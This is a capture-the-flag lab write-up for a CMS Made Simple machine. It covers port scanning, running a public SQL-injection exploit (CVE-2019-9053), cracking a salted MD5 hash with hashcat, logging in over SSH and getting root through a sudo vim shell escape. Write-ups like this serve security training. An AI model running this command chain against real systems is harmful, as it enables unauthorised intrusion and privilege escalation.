================================================================================
CTF WRITEUP: SIMPLE CTF (CMS Made Simple)
Target IP: 10.10.146.19
================================================================================

1. ENUMERATION & RECON
--------------------------------------------------------------------------------
Command: nmap -sC -sV -p 22,80,1000,2222 10.10.146.19
Results:
- 80/tcp   (HTTP) - Apache 2.4.18
- 2222/tcp (SSH)  - OpenSSH 7.2p2 (Standard SSH moved to non-standard port)
- 1000/tcp (CADLOCK) - Filtered

Web Discovery (Gobuster):
- /robots.txt : Disallowed entries for /openemr-5_0_1_3.
- /simple/    : CMS Made Simple installation found.

2. SQL INJECTION (CMS MADE SIMPLE)
--------------------------------------------------------------------------------
Vulnerability: CMS Made Simple < 2.2.10 (CVE-2019-9053)
Exploit: SQL Injection via Exploit-DB (46635.py)

Action: 
python3 46635.py -u http://10.10.146.19/simple/ -w /usr/share/wordlists/rockyou.txt

Extracted Data:
- Username: mitch
- Salt: 1dac0d92e9fa6bb2
- MD5 Hash: 0c01f4468bd75d7a84c7eb73846e8d96

Cracking the Hash:
Format: md5($salt.$pass) -> Hashcat Mode 20
Command: hashcat -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 wordlist.txt
Result: secret

3. INITIAL ACCESS
--------------------------------------------------------------------------------
SSH Login: ssh mitch@10.10.146.19 -p 2222
Password: secret
User Flag: Found in user.txt (mitch's home directory).

4. PRIVILEGE ESCALATION (GTFOBINS)
--------------------------------------------------------------------------------
Checking Sudo: sudo -l
Result: (root) NOPASSWD: /usr/bin/vim

Exploitation:
Vim allows shell execution from within the editor. Since it can be run as 
sudo, the spawned shell will be root.

Command: sudo vim -c ':!/bin/sh'



5. FINAL FLAGS
--------------------------------------------------------------------------------
Verification: id -> uid=0(root)
[ROOT] cat /root/root.txt -> "W3ll d0n3. You made it!"
================================================================================
